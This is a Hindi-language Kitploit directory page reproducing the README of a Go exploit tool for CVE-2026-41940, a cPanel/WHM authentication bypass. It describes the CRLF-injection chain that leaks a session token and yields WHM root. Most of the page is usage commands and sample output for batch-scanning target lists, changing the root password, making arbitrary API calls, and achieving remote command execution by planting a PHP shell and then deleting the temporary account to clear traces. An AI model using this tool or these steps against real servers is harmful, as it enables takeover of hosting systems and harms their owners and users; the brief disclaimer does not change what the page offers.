Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cPanelWHM-AuthBypass — Go-आधारित स्कैनर और CVE-2026-41940 के लिए एक्सप्लॉइट टूल, जो cPanel/WHM में एक प्रमाणीकरण बायपास है। बैच स्कैनिंग, टोकन लीकेज, और RCE, पासवर्ड बदलने, तथा API कॉल जैसी पोस्ट-एक्सप्लॉइटेशन क्रियाओं का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/kagantua/cpanelwhm-authbypass
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubkagantua/cpanelwhm-authbypass

cPanelWHM-AuthBypass

Go-आधारित स्कैनर और CVE-2026-41940 के लिए एक्सप्लॉइट टूल, जो cPanel/WHM में एक प्रमाणीकरण बायपास है। बैच स्कैनिंग, टोकन लीकेज, और RCE, पासवर्ड बदलने, तथा API कॉल जैसी पोस्ट-एक्सप्लॉइटेशन क्रियाओं का समर्थन करता है।

रिपॉजिटरी देखें
1073 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

cPanel/WHM Auth Bypass Scanner & Exploit Tool

watchTowr के Python PoC के आधार पर पुनर्लिखित Go कमांड-लाइन टूल, जो CVE-2026-41940 cPanel/WHM प्रमाणीकरण बायपास भेद्यता का पता लगाने और उसका शोषण करने के लिए है।

भेद्यता अवलोकन

CVE-2026-41940 cPanel/WHM की एक प्रमाणीकरण बायपास भेद्यता है, जिसमें हमले की श्रृंखला CRLF इंजेक्शन के माध्यम से Basic Auth हेडर में सुरक्षा टोकन लीक करती है और WHM root विशेषाधिकार प्राप्त करती है।

4-चरणीय हमला श्रृंखला:

  1. प्री-ऑथेंटिकेशन — /login/ पर गलत क्रेडेंशियल भेजें, मूल whostmgrsession कुकी प्राप्त करें
  2. CRLF इंजेक्शन — Authorization: Basic हेडर के माध्यम से न्यूलाइन इंजेक्ट करें, सर्वर को 307 रीडायरेक्ट के Location हेडर में cpsess सुरक्षा टोकन लीक करने के लिए प्रेरित करें
  3. टोकन प्रसार — इंजेक्टेड प्रमाणीकरण डेटा को मूल स्टोरेज से कैश में प्रसारित करने के लिए do_token_denied ट्रिगर करें
  • विशेषाधिकार सत्यापन — लीक हुए टोकन का उपयोग करके /json-api/version तक पहुँचें, सत्यापित करें कि root विशेषाधिकार प्राप्त हुआ है या नहीं
  • विशेषताएँ

    • बैच स्कैनिंग — फ़ाइल से बल्क में लक्ष्यों का पता लगाएं, समवर्ती निष्पादन
    • एकल लक्ष्य जाँच — एकल URL निर्दिष्ट करके त्वरित सत्यापन
    • URL स्मार्ट प्रोसेसिंग — http://, https://, बिना प्रोटोकॉल प्रारूपों के साथ स्वचालित संगतता, स्वचालित डीडुप्लिकेशन
    • भेद्यता शोषण
      • root पासवर्ड बदलें (-passwd)
      • मनमाना WHM API कॉल करें (-api)
      • वन-क्लिक लॉगिन URL उत्पन्न करें (-session)
      • रिमोट कमांड निष्पादन / RCE (-cmd)
    • टर्मिनल हाइलाइटिंग — [VULN] लाल, [SAFE] हरा हाइलाइट
    • परिणाम सहेजना — भेद्यता URL स्वचालित रूप से फ़ाइल में सहेजे जाते हैं

    संकलन

    root@kitploit:~
    # Go 1.20+ आवश्यक है
    cd cpanel-checker
    go build -o cpanel-checker .
    

    उपयोग विधि

    पैरामीटर सारांश

    पैरामीटरविवरणउदाहरण
    -uएकल लक्ष्य URL-u https://1.2.3.4:2087
    -fURL सूची वाली फ़ाइल-f targets.txt
    -oआउटपुट फ़ाइल पथ (डिफ़ॉल्ट result.txt)-o vuln.txt
    -cसमवर्ती संख्या (डिफ़ॉल्ट 10)-c 20
    -hostnameHost हेडर मैन्युअल रूप से निर्दिष्ट करें (डिफ़ॉल्ट स्वचालित खोज)-hostname cpanel.example.com
    -passwdroot पासवर्ड बदलें (केवल -u मोड)-passwd NewP@ss123
    -apiWHM API फ़ंक्शन कॉल करें (केवल -u मोड)-api listaccts
    -api-paramsWHM API पैरामीटर, अल्पविराम से अलग-api-params user=root,password=123
    -sessionroot वन-क्लिक लॉगिन URL उत्पन्न करें (केवल -u मोड)-session
    -keepRCE अस्थायी खाता रखें, हटाएँ नहीं (-cmd के साथ)-keep
    -cmdरिमोट कमांड निष्पादित करें / RCE (केवल -u मोड)-cmd "id"

    1. एकल लक्ष्य जाँच

    root@kitploit:~
    ./cpanel-checker -u https://target:2087
    

    पोर्ट डिफ़ॉल्ट रूप से 2087 है, निम्नलिखित लेखन समतुल्य हैं:

    root@kitploit:~
    ./cpanel-checker -u https://target
    ./cpanel-checker -u target
    

    2. बैच स्कैनिंग

    root@kitploit:~
    ./cpanel-checker -f targets.txt -c 20
    

    targets.txt निम्नलिखित प्रारूपों का समर्थन करता है (प्रत्येक पंक्ति में एक, # से शुरू होने वाली टिप्पणियाँ):

    root@kitploit:~
    https://1.1.1.1:2087
    http://2.2.2.2:2087
    3.3.3.3:2087
    4.4.4.4
    # यह एक टिप्पणी है
    
    • स्वचालित डीडुप्लिकेशन: http://1.1.1.1 और https://1.1.1.1 को एक ही लक्ष्य माना जाता है, केवल एक बार स्कैन किया जाता है
    • बिना प्रोटोकॉल वाले पते स्वचालित रूप से https:// में पूर्ण किए जाते हैं
    • बिना पोर्ट वाले पते स्वचालित रूप से 2087 का उपयोग करते हैं
    • परिणाम result.txt में सहेजे जाते हैं (-o के साथ अनुकूलित किया जा सकता है)

    3. root पासवर्ड बदलें

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -passwd "NewP@ssw0rd!"
    

    4. मनमाना WHM API कॉल करें

    root@kitploit:~
    # सभी खाते सूचीबद्ध करें
    ./cpanel-checker -u https://target:2087 -api listaccts
    
    # पैरामीटर के साथ कॉल करें
    ./cpanel-checker -u https://target:2087 -api passwd -api-params "user=root,password=abc123"
    

    5. वन-क्लिक लॉगिन URL उत्पन्न करें

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -session
    

    एक URL आउटपुट होता है, जिसे ब्राउज़र में खोलने पर WHM प्रबंधन पैनल में प्रवेश किया जा सकता है। पैनल में Terminal सुविधा का उपयोग करके इंटरैक्टिव root शेल प्राप्त किया जा सकता है।

    नोट: -session अर्ध-स्वचालित है — टूल लॉगिन URL उत्पन्न करने के बाद, आपको इसे मैन्युअल रूप से ब्राउज़र में खोलना होगा।

    6. रिमोट कमांड निष्पादन (RCE)

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id"
    

    -keep जोड़ने पर अस्थायी खाता रखा जाता है, जिसका उपयोग cPanel बैकएंड में लॉगिन करने के लिए किया जा सकता है:

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id" -keep
    

    -keep का उपयोग करने पर आउटपुट में अस्थायी खाते का उपयोगकर्ता नाम, पासवर्ड और cPanel लॉगिन पता (https://host:2083) शामिल होगा, इन क्रेडेंशियल्स का उपयोग सीधे cPanel पैनल में लॉगिन करने के लिए करें।

    -cmd पूर्णतः स्वचालित है, किसी अन्य मैन्युअल ऑपरेशन की आवश्यकता नहीं है। आंतरिक प्रक्रिया:

    1. प्रमाणीकरण बायपास का उपयोग करके root विशेषाधिकार प्राप्त करें
    2. WHM API के माध्यम से अस्थायी cPanel खाता बनाएँ
    3. UAPI (Fileman::save_file_content) के माध्यम से ~/public_html/ में PHP शेल लिखें
    4. HTTP के माध्यम से https://host/~tmpuser/shell.php तक पहुँचकर कमांड निष्पादित करें
    5. कमांड आउटपुट लौटाएँ
    6. अस्थायी खाता स्वचालित रूप से हटाएँ (निशान साफ़ करें)

    पूर्व शर्त: लक्ष्य का पोर्ट 80 या 443 पहुँच योग्य होना चाहिए, और Apache/httpd चल रहा होना चाहिए।

    7. संयोजन उपयोग

    कई शोषण पैरामीटर एक साथ उपयोग किए जा सकते हैं:

    root@kitploit:~
    # एक साथ लॉगिन URL प्राप्त करें, कमांड निष्पादित करें, पासवर्ड बदलें
    ./cpanel-checker -u https://target:2087 -session -cmd "id" -passwd "NewP@ss123"
    

    8. Host हेडर मैन्युअल रूप से निर्दिष्ट करें

    जब लक्ष्य IP और cPanel में कॉन्फ़िगर किया गया होस्टनाम मेल नहीं खाते हैं, तो मैन्युअल रूप से निर्दिष्ट किया जा सकता है:

    root@kitploit:~
    ./cpanel-checker -u https://1.2.3.4:2087 -hostname cpanel.example.com
    

    डिफ़ॉल्ट रूप से टूल /openid_connect/cpanelid के 307 रीडायरेक्ट के माध्यम से सही होस्टनाम स्वचालित रूप से खोजता है।

    आउटपुट उदाहरण

    बैच स्कैनिंग

    root@kitploit:~
    [1/5] [VULN] https://1.1.1.1:2087 - token=/cpsess1234567890
    [2/5] [SAFE] https://2.2.2.2:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    [3/5] [SAFE] https://3.3.3.3:2087 - stage1: request failed: dial tcp: i/o timeout
    [4/5] [VULN] https://4.4.4.4:2087 - token=/cpsess0987654321
    [5/5] [SAFE] https://5.5.5.5:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    
    ========== स्कैन पूर्ण ==========
    कुल: 5 | भेद्यता वाले: 2
    
      ● https://1.1.1.1:2087
      ● https://4.4.4.4:2087
    
    [+] परिणाम result.txt में सहेजे गए
    

    RCE निष्पादन

    root@kitploit:~
    [*] लक्ष्य: https://target:2087
    [*] मोड: शोषण
    
    [0] hostname = cpanel.example.com
    [1] minting a preauth session...
        session base = abc123def456
    [2] sending the CRLF injection (Basic auth + no-ob cookie)...
        leaked token = /cpsess1234567890
    [3] firing do_token_denied to propagate raw -> cache...
        gadget fired
    [4] verifying we're WHM root...
    [+] WHM root विशेषाधिकार प्राप्त हुआ
    
    [*] रिमोट कमांड निष्पादित कर रहा है (RCE)...
        [a] अस्थायी खाता बनाना: tmpabcde
        [b] शेल लिखना: /home/tmpabcde/public_html/random.php
        [c] कमांड निष्पादित करना: id
        [d] अस्थायी खाता साफ़ करना: tmpabcde
    [+] कमांड आउटपुट:
    uid=0(root) gid=0(root) groups=0(root)
    
    [+] पूर्ण। https://target:2087 नियंत्रित कर लिया गया है
    

    सावधानियाँ

    • शोषण पैरामीटर (-passwd, -api, -session, -cmd) केवल -u एकल लक्ष्य मोड में उपलब्ध हैं, -f बैच मोड का समर्थन नहीं करते
    • टूल डिफ़ॉल्ट रूप से TLS प्रमाणपत्र सत्यापन छोड़ देता है
    • अनुरोध टाइमआउट 15 सेकंड है
    • URL फ़ाइल में # से शुरू होने वाली पंक्तियाँ अनदेखी की जाती हैं

    अस्वीकरण

    यह टूल केवल अधिकृत सुरक्षा परीक्षण और शोध के लिए है। बिना प्राधिकरण के सिस्टम का परीक्षण करना अवैध है। उपयोगकर्ता को यह सुनिश्चित करना चाहिए कि उन्होंने लक्ष्य सिस्टम के स्वामी से स्पष्ट लिखित प्राधिकरण प्राप्त किया है। लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है।

    आभार

    • मूल PoC: watchTowr / Sina Kheirkhah (@SinSinology)
    • CVE: CVE-2026-41940
    टूल डाउनलोड करें